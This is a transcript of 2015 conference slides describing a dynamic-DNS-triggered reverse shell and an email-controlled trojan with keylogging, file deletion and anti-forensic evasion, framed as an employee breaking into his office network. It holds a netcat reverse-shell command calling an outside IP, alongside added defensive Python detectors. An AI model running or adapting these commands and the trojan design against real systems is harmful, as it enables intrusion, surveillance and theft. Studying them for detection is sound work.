Handle Exploitation of Remote System Without Being Online (Merchant Bhaumik)
Post on 26-May-2015
Handle Exploitation of Remote System Without Being Online!!
By Merchant Bhaumik
Who Am I?
• Currently helping local law enforcement and helping in securing some government websites
• Developer of IND 360 Intrusion Detection System (host based as well as network based detection)
• Communicating with the Metasploit guys to develop a term called "Universal Payload"
Presentation Flow
• Reverse shell using Dynamic DNS concepts
• Getting data from the victim computer using an email tool
We will understand this mechanism by considering one scenario.
Jack's Situation
Jack works in a company in which all computers are behind a NAT box, and he has just decided to break into one of the systems of his office and get a shell from the office to his home computer.
Problems for Jack
• The company has a NIDS/IPS (network IDS), so no inbound connections.
• He doesn't know what IP address is allocated to him by his ISP.
• He can't use any mechanism which constantly sends some outbound traffic.
Good Thing for Jack
• Jack's office allows him to access his Gmail account and allows some outbound traffic.
I. #include <REVERSE SHELL>
Why Reverse Shell?
• A reverse shell is one of the most powerful methods for bypassing network intrusion detection systems, (most) firewalls, etc.
• Because some of these network IDS only monitor inbound connections, not outbound.
• Jack has a DMZ network in his office.
Diagram 1: office network (192.168.1.1 to 192.168.1.5) in a DMZ behind NAT with public IP 117.254.4.123; Jack's machine on the Internet has the individual IP 49.24.3.12.
Diagram 2 (Normal Attack!): office network (192.168.1.1 to 192.168.1.4) in a DMZ behind NAT with public IP 117.254.4.123; attacker IP 49.24.3.12 on the Internet.
Step I: Start handler on port 4343
nc -l -p 4343
Step II: Victim connects back to the attacker
nc 49.24.3.12 4343 -e cmd.exe
Normal Flow of Getting Reverse Shell
1. Attacker starts handler.
2. Vulnerability injection and all that (Exploit!).
3. Victim sends reverse shell to the attacker machine.
4. For the reverse shell scenario: Attacker wins!
But What's Wrong with Jack?
He doesn't know what IP address is allocated to his computer (dynamic IP allocation by ISPs).
Solution
The attacker is "offline" but still he will get the reverse shell.
My Way
1. Attacker starts handler (starting the handler on the local machine is optional!).
2. Vulnerability injection and all that (Exploit!).
3. Victim sends reverse shell to the attacker machine.
4. For the reverse shell scenario: Attacker wins!
Flow of Execution (Attacker)
Attack -> exe running in victim machine -> Did the attacker update the IP?
  Yes -> Attacker receives reverse shell
  No -> exe keeps running in the victim machine and checks again
* If the attacker is not online, the exe is still up and running in the remote machine, and if the attacker updates the DNS records, the reverse shell is on the attacker's desk!!
Mechanism
• If the code (first part) receives a positive acknowledgement of sending packets, Jack will get the reverse shell.
• Else it keeps running in the victim machine and waits for the ack from the attacker's machine.
Dynamic DNS Way (Initially!)
• First part: catchme.dyndns-ip.com (255.255.255.255)
• Second part: payload.dyndns-ip.com (255.255.255.255)
The new final exe (New.exe) consists of the first part and the second part, executed synchronously as a single EXE.
Dynamic DNS Way (Finally!)
• First part: catchme.dyndns-ip.com (127.0.0.1)
• Second part: payload.dyndns-ip.com (attacker's IP)
The new final exe (New.exe) consists of the first part and the second part, executed synchronously as a single EXE.
Metasploit!!!!!
• You can embed my method (or my exe) with the Metasploit payload of your choice.
* The structure of the new exe will be as follows:
The new final exe (New.exe) consists of my tool and the MSF payload (LHOST = dynamic), executed synchronously as a single EXE.
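From the defender's side, the wake-up mechanism above leaves a distinctive trace in resolver logs: a host polling a dynamic-DNS name that answers with a non-routable placeholder, that answer flipping, and a second dynamic-DNS name then resolving to a public address. The following Python is an added detection example, not code from the talk or the author's tool; the log lines, their column layout and the DYN_DNS_SUFFIXES watch-list are constructed assumptions (the addresses reuse the ones from the slides).

```python
import ipaddress
from collections import defaultdict

# Constructed resolver log, not from the talk: "epoch client qname answer".
SAMPLE_LOG = """\
1432627200 192.168.1.3 catchme.dyndns-ip.com 255.255.255.255
1432627260 192.168.1.3 catchme.dyndns-ip.com 255.255.255.255
1432627320 192.168.1.3 catchme.dyndns-ip.com 255.255.255.255
1432627380 192.168.1.3 catchme.dyndns-ip.com 127.0.0.1
1432627381 192.168.1.3 payload.dyndns-ip.com 49.24.3.12
1432627200 192.168.1.4 www.example.com 93.184.216.34
1432627500 192.168.1.4 www.example.com 93.184.216.34
"""
# Assumption: a site-maintained watch-list of dynamic-DNS provider suffixes.
DYN_DNS_SUFFIXES = (".dyndns-ip.com", ".no-ip.org", ".duckdns.org")

def routable(addr):
    # Placeholders such as 255.255.255.255 or 127.0.0.1 are not global.
    return ipaddress.ip_address(addr).is_global

def parse_log(text):
    """Return (ts, client, qname, answer) tuples, oldest first."""
    rows = []
    for line in text.splitlines():
        ts, client, qname, answer = line.split()
        rows.append((int(ts), client, qname.lower(), answer))
    return sorted(rows)

def detect(text, min_polls=3, window=60):
    """sleeping-beacon: a dyn-DNS name polled min_polls times with a non-routable
    answer; signal-flip: that answer changed; callback-target: a dyn-DNS name
    resolving to a public IP within `window` s of a flip on the same client."""
    alerts, last, polls, flipped_at = [], {}, defaultdict(int), {}
    for ts, client, qname, answer in parse_log(text):
        if not qname.endswith(DYN_DNS_SUFFIXES):
            continue  # only watch-listed dynamic-DNS names are of interest
        key = (client, qname)
        if not routable(answer):
            polls[key] += 1
            if polls[key] == min_polls:
                alerts.append(("sleeping-beacon", client, qname, answer))
        prev = last.get(key)
        if prev is not None and prev != answer and not routable(prev):
            alerts.append(("signal-flip", client, qname, f"{prev}->{answer}"))
            flipped_at[client] = ts
        if routable(answer) and ts - flipped_at.get(client, float("-inf")) <= window:
            alerts.append(("callback-target", client, qname, answer))
        last[key] = answer
    return alerts
```

On the sample log this yields three alerts for 192.168.1.3 in order: the sleeping beacon on catchme.dyndns-ip.com, its flip to 127.0.0.1, and payload.dyndns-ip.com resolving to 49.24.3.12 one second later.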
Hands-On Network: office network (192.168.1.1 to 192.168.1.5) in a DMZ behind NAT with public IP 117.254.4.123; individual IP 49.24.3.12 on the Internet.
Time to Enjoy Cooked Cookies and Recipes!!
Demo
II. #include <EMAIL TOOL>
Normal Remote Trojans & Viruses!
• Attacker (must be online!)
• Victim (must be online!)
My Tool!!
• Attacker may or may not be online!!
• Victim may or may not be online!!
Caution: No need to be online, attackers!!
So, How It Works??
Attacker -> Zombie -> Victim
But, who is the zombie?? It may be one of the below (shown as images on the slides, not in the transcript).
Features!!
• Execute operating system level commands by using emails!
• Get all network card information with allocated IP addresses!
• Live tracking of the system being used by the victim!
• Get the list of all available accounts!
• Enable/disable key logger!
• All this stuff with Gmail, Yahoo, Hotmail!!
About It!
It is a simple application which, once up and going on the victim's computer, the attacker can handle using the Gmail, Yahoo or Hotmail email services. There is no need for the attacker to be online to attack the victim system. The attacker has to send attack instructions to any of the mail services, and then it is like sitting at the door and watching the event, "when it's gonna open!!" As the victim connects to the internet, the attack launches and the results are automatically sent back to the attacker's email address.
Cool Benefits!!
• If the email account is used via one of the services shown below, then it is totally anti-forensic! No reverse detection is possible!
• Create a unique password for all individual victims who are infected.
• Ability to handle multiple clients simultaneously.
• Delete files in the victim's computer by simply sending an email.
• No antivirus can detect the attack because of HTTPS.
Tool Syntax
Password_For_Victim ":" Task_Commands ":"
E.g. Pwd$98$ : Account_info :
"Pwd$98$" is the password for the particular victim; "Account_info" is the command which sends back an email containing the account info in the victim computer!
Snapshot 1 (Load Attack Instructions): shows the password for the individual victim and the commands to send account info of the victim, send drive info of the victim, and send MAC / network card info.
Snapshot 2 (Get Back Attack Result): my email account with the attached info of the victim's computer, as per the attacker's choice.
Why Gmail??
• No fear of detection 1: No direct connection between attacker and victim.
• No fear of detection 2: No virus detection due to HTTPS. No digital signatures!! Ability to self-destruct!
How to Spread This Code??
• autorun.inf on USB drives
• Physical access to the victim's system
• During Metasploit exploitation
Further Possible Development!!
This code is flexible enough to be developed further by my hacker friends. It is also possible in future to send exploits or trojans by using this code. Anyone can send exploits, trojans, rootkits, backdoors by simply attaching them to an email and sending it to his own account or the account that is configured in the victim's code.
Pros N Cons 1! (Be Transparent!!)
• Advantages are that the attacker is never going to get caught if he/she uses a browser like TOR, Anonymizer, VPNs or any proxy for accessing the attacking Gmail account.
• No antivirus can detect the instruction data because all traffic is going to come over HTTPS!
• Only a single Gmail email account is going to be used for both sides. The attacker and victim machine both connect to the same account, but the attacker knows, and the victim doesn't!!
Pros N Cons 2
• The disadvantage is that if the victim has the habit of checking the current connections using commands like 'netstat -n', then there is a possibility of detecting the Gmail connection when there is actually no browser activity. But still it is difficult to detect, because the process is running in hidden mode.
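The netstat check in that caveat is the defender's handle on this tool: a mail or HTTPS session that no browser or mail client owns. As an added example (not code from the talk), the Python below parses Windows 'netstat -nob' output, whose -o and -b switches attribute each socket to a PID and image name that plain 'netstat -n' omits, and flags established connections to HTTPS or mail ports owned by an unexpected process. The output sample and the ALLOWED list are constructed assumptions; the remote addresses are documentation addresses.

```python
import re

# Constructed 'netstat -nob' output (documentation addresses), not from the talk.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    192.168.1.3:49712      203.0.113.10:443       ESTABLISHED     4120
 [chrome.exe]
  TCP    192.168.1.3:49713      203.0.113.10:993       ESTABLISHED     2216
 [update.exe]
  TCP    192.168.1.3:49714      203.0.113.10:443       ESTABLISHED     2216
 [update.exe]
  TCP    192.168.1.3:49715      192.168.1.1:445        ESTABLISHED     4
  Can not obtain ownership information
"""
MAIL_PORTS = {443, 465, 587, 993, 995}  # HTTPS webmail plus IMAPS/POP3S/submission
# Assumption: the images expected to talk to webmail or mail servers on this host.
ALLOWED = {"chrome.exe", "firefox.exe", "msedge.exe", "outlook.exe", "thunderbird.exe"}
ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s*$")

def parse_netstat(text):
    """Parse socket rows; a following '[image.exe]' line names the owning process."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            proto, local, remote, state, pid = m.groups()
            host, _, port = remote.rpartition(":")
            rows.append({"proto": proto, "remote": host, "port": int(port),
                         "state": state, "pid": int(pid), "image": None})
        elif line.strip().startswith("[") and rows:
            rows[-1]["image"] = line.strip().strip("[]").lower()
    return rows

def suspicious(rows):
    """ESTABLISHED sockets to mail/HTTPS ports not owned by an allowed image."""
    return [r for r in rows if r["state"] == "ESTABLISHED"
            and r["port"] in MAIL_PORTS and r["image"] not in ALLOWED]

if __name__ == "__main__":
    for r in suspicious(parse_netstat(SAMPLE_NETSTAT)):
        print(f"pid {r['pid']} {r['image']} -> {r['remote']}:{r['port']}")
```

A hidden process still shows up here because the socket table is kernel state; hiding the window does not hide the connection.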
Hands-On Time! (Demo)
For More: backdoor.security@gmail.com
Thanks Guys for Checking It Out!